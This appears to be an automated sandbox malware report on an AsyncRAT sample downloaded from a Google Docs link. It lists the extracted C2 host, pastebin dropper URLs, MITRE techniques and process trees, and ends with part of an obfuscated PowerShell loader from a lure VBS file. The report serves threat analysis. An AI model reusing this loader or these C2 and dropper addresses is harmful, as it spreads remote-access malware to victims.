asyncrat | hxxps://docs[.]google[.]com/uc?export=download&id=1lzz62BV4CEFlzOh4fZ9XrdAtps_pLNB9

Analysis

max time kernel
145s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
10-10-2024 21:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://docs.google.com/uc?export=download&id=1lzz62BV4CEFlzOh4fZ9XrdAtps_pLNB9

Score

10^/10

asyncrat septiembre20 discovery execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pastebin.com/raw/Adv9gBHa

exe.dropper

https://pastebin.com/raw/Adv9gBHa

Extracted

Family

asyncrat

Version

1.0.7

Botnet

septiembre20

peinadorafael777.duckdns.org:2013

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Blocklisted process makes network request 28 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
39	4704	powershell.exe
41	4704	powershell.exe
44	4704	powershell.exe
48	4704	powershell.exe
66	1032	powershell.exe
67	1032	powershell.exe
69	1032	powershell.exe
70	1032	powershell.exe
72	3844	powershell.exe
73	3844	powershell.exe
75	3844	powershell.exe
77	3844	powershell.exe
78	4476	powershell.exe
79	4476	powershell.exe
81	4476	powershell.exe
82	4476	powershell.exe
89	1532	powershell.exe
91	1532	powershell.exe
93	1532	powershell.exe
94	1532	powershell.exe
99	1092	powershell.exe
100	1092	powershell.exe
102	1092	powershell.exe
103	1092	powershell.exe
105	980	powershell.exe
106	980	powershell.exe
108	980	powershell.exe
109	980	powershell.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeWScript.exeCScript.exeCScript.exeWScript.exeWScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	CScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	CScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
5072	powershell.exe
1032	powershell.exe
1532	powershell.exe
4132	powershell.exe
4476	powershell.exe
980	powershell.exe
4704	powershell.exe
4532	powershell.exe
3844	powershell.exe
3960	powershell.exe
1360	powershell.exe
920	powershell.exe
1092	powershell.exe
2792	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 17 IoCs

Web Service

T1102

Processes:

flow	ioc
38	pastebin.com
66	pastebin.com
72	pastebin.com
73	bitbucket.org
99	pastebin.com
100	bitbucket.org
39	pastebin.com
40	bitbucket.org
78	pastebin.com
79	bitbucket.org
105	pastebin.com
41	bitbucket.org
67	bitbucket.org
89	pastebin.com
91	bitbucket.org
90	bitbucket.org
106	bitbucket.org

Suspicious use of SetThreadContext 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 4704 set thread context of 4152	4704	powershell.exe	AddInProcess32.exe
PID 1032 set thread context of 2492	1032	powershell.exe	AddInProcess32.exe
PID 3844 set thread context of 2744	3844	powershell.exe	AddInProcess32.exe
PID 4476 set thread context of 444	4476	powershell.exe	AddInProcess32.exe
PID 1532 set thread context of 4684	1532	powershell.exe	AddInProcess32.exe
PID 1092 set thread context of 4232	1092	powershell.exe	AddInProcess32.exe
PID 980 set thread context of 3092	980	powershell.exe	AddInProcess32.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

AddInProcess32.exeAddInProcess32.exeAddInProcess32.exeAddInProcess32.exeAddInProcess32.exeAddInProcess32.exeAddInProcess32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies registry class 1 IoCs

Processes:

OpenWith.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings OpenWith.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	OpenWith.exe

Suspicious behavior: EnumeratesProcesses 60 IoCs

Processes:

msedge.exemsedge.exemsedge.exeidentity_helper.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exemsedge.exe

pid	process
2112	msedge.exe
2112	msedge.exe
1404	msedge.exe
1404	msedge.exe
3832	msedge.exe
3832	msedge.exe
1280	identity_helper.exe
1280	identity_helper.exe
5072	powershell.exe
5072	powershell.exe
5072	powershell.exe
4704	powershell.exe
4704	powershell.exe
4704	powershell.exe
4532	powershell.exe
4532	powershell.exe
4532	powershell.exe
1032	powershell.exe
1032	powershell.exe
1032	powershell.exe
4132	powershell.exe
4132	powershell.exe
4132	powershell.exe
3844	powershell.exe
3844	powershell.exe
3844	powershell.exe
3960	powershell.exe
3960	powershell.exe
3960	powershell.exe
3844	powershell.exe
3844	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
1360	powershell.exe
1360	powershell.exe
1360	powershell.exe
1532	powershell.exe
1532	powershell.exe
1532	powershell.exe
920	powershell.exe
920	powershell.exe
920	powershell.exe
1092	powershell.exe
1092	powershell.exe
1092	powershell.exe
2792	powershell.exe
2792	powershell.exe
2792	powershell.exe
980	powershell.exe
980	powershell.exe
980	powershell.exe
980	powershell.exe
980	powershell.exe
980	powershell.exe
980	powershell.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

Processes:

msedge.exe

pid process

1404 msedge.exe
1404 msedge.exe
1404 msedge.exe
1404 msedge.exe
1404 msedge.exe
1404 msedge.exe
1404 msedge.exe
1404 msedge.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

7zG.exepowershell.exepowershell.exeAddInProcess32.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeRestorePrivilege	4576	7zG.exe
Token: 35	4576	7zG.exe
Token: SeSecurityPrivilege	4576	7zG.exe
Token: SeSecurityPrivilege	4576	7zG.exe
Token: SeDebugPrivilege	5072	powershell.exe
Token: SeDebugPrivilege	4704	powershell.exe
Token: SeDebugPrivilege	4152	AddInProcess32.exe
Token: SeDebugPrivilege	4532	powershell.exe
Token: SeDebugPrivilege	1032	powershell.exe
Token: SeDebugPrivilege	4132	powershell.exe
Token: SeDebugPrivilege	3844	powershell.exe
Token: SeDebugPrivilege	3960	powershell.exe
Token: SeDebugPrivilege	4476	powershell.exe
Token: SeDebugPrivilege	1360	powershell.exe
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeDebugPrivilege	920	powershell.exe
Token: SeDebugPrivilege	1092	powershell.exe
Token: SeDebugPrivilege	2792	powershell.exe
Token: SeDebugPrivilege	980	powershell.exe

Suspicious use of FindShellTrayWindow 35 IoCs

Processes:

msedge.exe7zG.exeNOTEPAD.EXE

pid	process
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
4576	7zG.exe
3952	NOTEPAD.EXE

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	process
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe
1404	msedge.exe

Suspicious use of SetWindowsHookEx 15 IoCs

Processes:

OpenWith.exe

pid	process
4756	OpenWith.exe
4756	OpenWith.exe
4756	OpenWith.exe
4756	OpenWith.exe
4756	OpenWith.exe
4756	OpenWith.exe
4756	OpenWith.exe
4756	OpenWith.exe
4756	OpenWith.exe
4756	OpenWith.exe
4756	OpenWith.exe
4756	OpenWith.exe
4756	OpenWith.exe
4756	OpenWith.exe
4756	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 1404 wrote to memory of 4276	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4276	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 4696	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 2112	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 2112	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 2916	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 2916	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 2916	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 2916	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 2916	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 2916	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 2916	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 2916	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 2916	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 2916	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 2916	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 2916	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 2916	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 2916	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 2916	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 2916	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 2916	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 2916	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 2916	1404	msedge.exe	msedge.exe
PID 1404 wrote to memory of 2916	1404	msedge.exe	msedge.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://docs.google.com/uc?export=download&id=1lzz62BV4CEFlzOh4fZ9XrdAtps_pLNB9
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1404

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbc53746f8,0x7ffbc5374708,0x7ffbc5374718
2⤵
PID:4276

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,15286904511320090801,11762225270771226752,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:2
2⤵
PID:4696

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,15286904511320090801,11762225270771226752,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,15286904511320090801,11762225270771226752,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8
2⤵
PID:2916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,15286904511320090801,11762225270771226752,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
2⤵
PID:3432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,15286904511320090801,11762225270771226752,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
2⤵
PID:2036

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,15286904511320090801,11762225270771226752,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1
2⤵
PID:4592

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2084,15286904511320090801,11762225270771226752,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5244 /prefetch:8
2⤵
PID:1184

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,15286904511320090801,11762225270771226752,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1
2⤵
PID:5112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,15286904511320090801,11762225270771226752,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5516 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3832

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,15286904511320090801,11762225270771226752,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5940 /prefetch:8
2⤵
PID:1252

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,15286904511320090801,11762225270771226752,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5940 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1280

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,15286904511320090801,11762225270771226752,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:1
2⤵
PID:1700

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,15286904511320090801,11762225270771226752,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
2⤵
PID:1716

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,15286904511320090801,11762225270771226752,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
2⤵
PID:3440

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,15286904511320090801,11762225270771226752,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6188 /prefetch:1
2⤵
PID:3832

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,15286904511320090801,11762225270771226752,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5836 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1572

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1016

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4868

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:444

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap15787:142:7zEvent6834
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4576

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#10102024102800000.vbs"
1⤵
- Checks computer location settings
PID:424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆B3☆G8☆d☆Bn☆HU☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆Hg☆awB0☆H☆☆dQ☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆YgB0☆G0☆Z☆B6☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆YgB0☆G0☆Z☆B6☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv